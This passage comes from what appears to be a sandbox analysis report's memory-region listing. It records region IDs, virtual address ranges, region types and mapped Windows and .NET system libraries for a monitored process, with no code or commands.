0x1a730000 end_va = 0x1a82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a730000" filename = "" Region: id = 740 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 741 start_va = 0x1a9d0000 end_va = 0x1ac9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 742 start_va = 0x7feeefd0000 end_va = 0x7fef05ccfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll") Region: id = 743 start_va = 0x7fffff10000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 744 start_va = 0x7fffff00000 end_va = 0x7fffff0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 745 start_va = 0x7fe926a0000 end_va = 0x7fe9271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe926a0000" filename = "" Region: id = 746 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 747 start_va = 0x9b0000 end_va = 0xa2cfff monitored = 0 entry_point = 0x9bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 748 start_va = 0x9b0000 end_va = 0xa2cfff monitored = 0 entry_point = 0x9bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 749 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 750 start_va = 0x7fe92720000 end_va = 0x7fe9272ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92720000" filename = "" Region: id = 751 start_va = 0x7fef75f0000 end_va = 0x7fef75f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 752 start_va = 0x7fef46b0000 end_va = 0x7fef47fefff monitored = 1 entry_point = 0x7fef46b1090 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 753 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 754 start_va = 0x1aca0000 end_va = 0x1aeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 755 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 756 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 757 start_va = 0x3a0000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 758 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 759 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 760 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 761 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 762 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 763 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 764 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 765 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 766 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 767 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 768 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 769 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 770 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 771 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 772 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 773 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 774 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 775 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 776 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 777 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 778 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 779 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 780 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 781 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 782 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 783 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 784 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 785 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 786 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 787 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 788 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 789 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 790 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 791 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 792 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 793 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 794 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 795 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 796 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 797 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 798 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 799 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 800 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 801 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 802 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 803 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 804 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 805 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 806 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 807 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 808 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 809 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 810 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 811 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 812 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 813 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 814 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 815 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 816 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 817 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 818 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 819 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 820 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 821 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 822 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 823 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 824 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 825 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 826 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 827 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 828 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 829 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 830 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 831 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 832 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 833 start_va = 0x1af00000 end_va = 0x1affffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af00000" filename = "" Region: id = 834 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 835 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 836 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 837 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 838 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 839 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 840 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 841 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 842 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 843 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 844 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 845 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 846 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 847 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 848 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 849 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 850 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 851 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 852 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 853 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 854 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 855 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 856 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 857 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 858 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 859 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 860 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 861 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 862 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 863 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 864 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 865 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 866 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 867 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 868 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 869 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 870 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 871 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 872 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 873 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 874 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 875 start_va = 0x1b030000 end_va = 0x1b12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b030000" filename = "" Region: id = 876 start_va = 0x7ffffefe000 end_va = 0x7ffffefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffefe000" filename = "" Region: id = 877 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 878 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 879 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 880 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 881 start_va = 0x1acb0000 end_va = 0x1adaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001acb0000" filename = "" Region: id = 882 start_va = 0x1ae30000 end_va = 0x1aeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae30000" filename = "" Region: id = 883 start_va = 0x7fef0f60000 end_va = 0x7fef1bcefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\e43dd9c73ab5615e461bf5109c3facd6\\system.ni.dll") Region: id = 884 start_va = 0x7ffffefc000 end_va = 0x7ffffefdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffefc000" filename = "" Region: id = 885 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 886 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 887 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 888 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 889 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 890 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 891 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 892 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 893 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 894 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 895 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 896 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 897 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 898 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 899 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 900 start_va = 0x9f0000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 901 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 902 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 903 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 904 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 905 start_va = 0xa50000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 906 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 907 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 908 start_va = 0xc30000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 909 start_va = 0xc40000 end_va = 0xc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 910 start_va = 0xe50000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 911 start_va = 0xe60000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 912 start_va = 0x1a710000 end_va = 0x1a71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a710000" filename = "" Region: id = 913 start_va = 0x1a720000 end_va = 0x1a72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a720000" filename = "" Region: id = 914 start_va = 0x1a830000 end_va = 0x1a83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a830000" filename = "" Region: id = 915 start_va = 0x1a840000 end_va = 0x1a84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a840000" filename = "" Region: id = 916 start_va = 0x1a850000 end_va = 0x1a85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a850000" filename = "" Region: id = 917 start_va = 0x1a860000 end_va = 0x1a86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a860000" filename = "" Region: id = 918 start_va = 0x1a870000 end_va = 0x1a87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a870000" filename = "" Region: id = 919 start_va = 0x1a880000 end_va = 0x1a88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a880000" filename = "" Region: id = 920 start_va = 0x1a890000 end_va = 0x1a89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a890000" filename = "" Region: id = 921 start_va = 0x1a8a0000 end_va = 0x1a8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a8a0000" filename = "" Region: id = 922 start_va = 0x1a8b0000 end_va = 0x1a8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a8b0000" filename = "" Region: id = 923 start_va = 0x1a8c0000 end_va = 0x1a8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a8c0000" filename = "" Region: id = 924 start_va = 0x1aca0000 end_va = 0x1acaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 925 start_va = 0x1adb0000 end_va = 0x1adbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001adb0000" filename = "" Region: id = 926 start_va = 0x1adc0000 end_va = 0x1adcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001adc0000" filename = "" Region: id = 927 start_va = 0x1add0000 end_va = 0x1addffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001add0000" filename = "" Region: id = 928 start_va = 0x1ade0000 end_va = 0x1adeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ade0000" filename = "" Region: id = 929 start_va = 0x1adf0000 end_va = 0x1adfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001adf0000" filename = "" Region: id = 930 start_va = 0x1ae00000 end_va = 0x1ae0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae00000" filename = "" Region: id = 931 start_va = 0x1ae10000 end_va = 0x1ae1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae10000" filename = "" Region: id = 932 start_va = 0x1ae20000 end_va = 0x1ae2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae20000" filename = "" Region: id = 933 start_va = 0x1aeb0000 end_va = 0x1aebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aeb0000" filename = "" Region: id = 934 start_va = 0x1aec0000 end_va = 0x1aecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aec0000" filename = "" Region: id = 935 start_va = 0x1aed0000 end_va = 0x1aedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aed0000" filename = "" Region: id = 936 start_va = 0x1aee0000 end_va = 0x1aeeffff monitored = 1 entry_point = 0x0 region_type = private name = 